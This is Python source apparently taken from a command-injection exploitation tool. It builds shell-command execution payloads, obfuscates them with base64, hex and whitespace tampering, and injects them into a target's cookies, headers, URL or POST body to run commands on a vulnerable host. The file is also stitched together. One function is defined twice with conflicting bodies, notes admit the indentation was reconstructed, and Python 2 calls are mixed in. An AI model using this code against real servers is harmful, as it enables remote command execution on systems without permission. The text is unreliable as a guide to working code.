def perform_payload_modification(payload):
    """Apply the enabled tamper modules to *payload* and return the result.

    Two passes are made over ``settings.MULTI_ENCODED_PAYLOAD``. The first
    calls ``transform`` on the ``singlequotes``, ``backslashes``, ``caret``
    and ``nested`` modules; the second calls ``encode`` on ``base64encode``
    and ``hexencode``. Entries with any other name are skipped in both
    passes.
    """
    # NOTE(review): set() drops duplicates, but a set does not iterate in
    # list order, so the [::-1] reversal does not determine the order in
    # which the transforms below are applied.
    for tamper_name in list(set(settings.MULTI_ENCODED_PAYLOAD[::-1])):
        # Each module is imported only when its name is actually listed.
        if tamper_name == 'singlequotes':
            from src.core.tamper import singlequotes as rewriter
        elif tamper_name == 'backslashes':
            from src.core.tamper import backslashes as rewriter
        elif tamper_name == 'caret':
            from src.core.tamper import caret as rewriter
        elif tamper_name == 'nested':
            from src.core.tamper import nested as rewriter
        else:
            continue
        payload = rewriter.transform(payload)

    # The setting is read again for the second pass, which therefore runs
    # on the output of every transform applied above.
    for tamper_name in list(set(settings.MULTI_ENCODED_PAYLOAD[::-1])):
        if tamper_name == 'base64encode':
            from src.core.tamper import base64encode as encoder
        elif tamper_name == 'hexencode':
            from src.core.tamper import hexencode as encoder
        else:
            continue
        payload = encoder.encode(payload)

    return payload
def perform_payload_encoding(payload):
    """Run *payload* through the encoder tamper modules that are listed.

    ``settings.MULTI_ENCODED_PAYLOAD`` is walked from its last entry to its
    first. A ``'base64encode'`` or ``'hexencode'`` entry replaces the payload
    with the result of that module's ``encode``; every other entry is
    ignored. The (possibly unchanged) payload is returned.
    """
    # The reversed slice is taken once, before the loop starts.
    pending = settings.MULTI_ENCODED_PAYLOAD[::-1]
    for tamper_name in pending:
        # Import lazily so only the listed encoders are loaded.
        if tamper_name == 'base64encode':
            from src.core.tamper import base64encode as encoder
        elif tamper_name == 'hexencode':
            from src.core.tamper import hexencode as encoder
        else:
            continue
        payload = encoder.encode(payload)
    return payload
def perform_payload_modification(payload):
    """Apply the listed tamper modules to *payload* and return the result.

    ``settings.MULTI_ENCODED_PAYLOAD`` is walked twice, each time from its
    last entry to its first. The first pass handles ``'singlequotes'``
    (via ``transform``), the second handles ``'base64encode'`` and
    ``'hexencode'`` (via ``encode``). Other names are ignored.
    """
    # Pass 1: the quoting transform.
    for tamper_name in settings.MULTI_ENCODED_PAYLOAD[::-1]:
        if tamper_name != 'singlequotes':
            continue
        from src.core.tamper import singlequotes
        payload = singlequotes.transform(payload)

    # Pass 2: the encoders, which run on the output of pass 1. The setting
    # is sliced again here rather than reusing the first pass's copy.
    for tamper_name in settings.MULTI_ENCODED_PAYLOAD[::-1]:
        if tamper_name == 'base64encode':
            from src.core.tamper import base64encode as encoder
        elif tamper_name == 'hexencode':
            from src.core.tamper import hexencode as encoder
        else:
            continue
        payload = encoder.encode(payload)

    return payload
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace,
                    http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
                    alter_shell, filename):
    """Build the payload for *cmd*, send it in one HTTP request and return the response.

    The incoming ``payload`` argument is overwritten on the first statement,
    and ``TAG`` and ``filename`` are not referenced in this body. The payload
    is built by ``fb_payloads``, wrapped with ``prefix``/``suffix``, has its
    spaces replaced by ``whitespace`` and is optionally encoded. It is then
    placed in a cookie, User-Agent, Referer, custom header, GET URL or POST
    body, depending on the options and settings checked below.

    Returns whatever the selected ``*_injection_test`` helper or
    ``requests.get_request_response`` returns.

    NOTE(review): the block nesting was reconstructed from a listing that
    had lost its indentation -- confirm against the original file.
    NOTE(review): ``urllib2`` and ``urllib.unquote`` are Python 2 names.
    """
    # Execute shell commands on vulnerable host.
    if alter_shell:
        payload = fb_payloads.cmd_execution_alter_shell(
            separator, cmd, OUTPUT_TEXTFILE)
    else:
        payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation: every literal space becomes the `whitespace` string.
    payload = re.sub(" ", whitespace, payload)

    # Encode payload to base64 format. The elif makes the two encoders
    # mutually exclusive here: base64encode wins when both flags are set.
    if settings.TAMPER_SCRIPTS['base64encode']:
        from src.core.tamper import base64encode
        payload = base64encode.encode(payload)

    # Encode payload to hex format.
    elif settings.TAMPER_SCRIPTS['hexencode']:
        from src.core.tamper import hexencode
        payload = hexencode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
        # Display copy with newlines shown as the two characters "\n".
        payload_msg = payload.replace("\n", "\\n")
        if settings.COMMENT in payload_msg:
            # NOTE(review): this truncates the payload that is actually sent,
            # not just the display copy, and (as reconstructed) only when
            # verbosity is >= 1 -- so the log level changes the request.
            payload = payload.split(settings.COMMENT)[0].strip()
            payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
        info_msg = "Executing the '" + cmd.split(
            settings.COMMENT)[0].strip() + "' command... "
        sys.stdout.write(settings.print_info_msg(info_msg))
        sys.stdout.flush()
        # The payload itself is echoed to stdout (payload_msg is not used).
        output_payload = "\n" + settings.print_payload(payload)
        if settings.VERBOSITY_LEVEL >= 1:
            output_payload = output_payload + "\n"
        sys.stdout.write(output_payload)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":
            # Check if its not specified the 'INJECT_HERE' tag
            #url = parameters.do_GET_check(url)

            # Only spaces are percent-encoded; other characters go as-is.
            payload = payload.replace(" ", "%20")
            # The payload is the re.sub replacement string, so backslash
            # sequences in it are processed by re.sub.
            target = re.sub(settings.INJECT_TAG, payload, url)
            # Local rebinding only; the joined value is not used afterwards.
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request
            response = requests.get_request_response(request)

        else:
            # Check if defined method is POST.
            parameter = menu.options.data
            parameter = urllib2.unquote(parameter)

            # Check if its not specified the 'INJECT_HERE' tag
            parameter = parameters.do_POST_check(parameter)

            # Define the POST data
            if settings.IS_JSON:
                # Escape double quotes so the payload can sit in a JSON string.
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                              parameter)
                try:
                    data = json.loads(data, strict=False)
                except:
                    # Best effort: on any error `data` stays the substituted
                    # string and is serialized by json.dumps below as-is.
                    pass
                request = urllib2.Request(url, json.dumps(data))
            else:
                if settings.IS_XML:
                    data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                                  parameter)
                else:
                    data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request
            response = requests.get_request_response(request)

    return response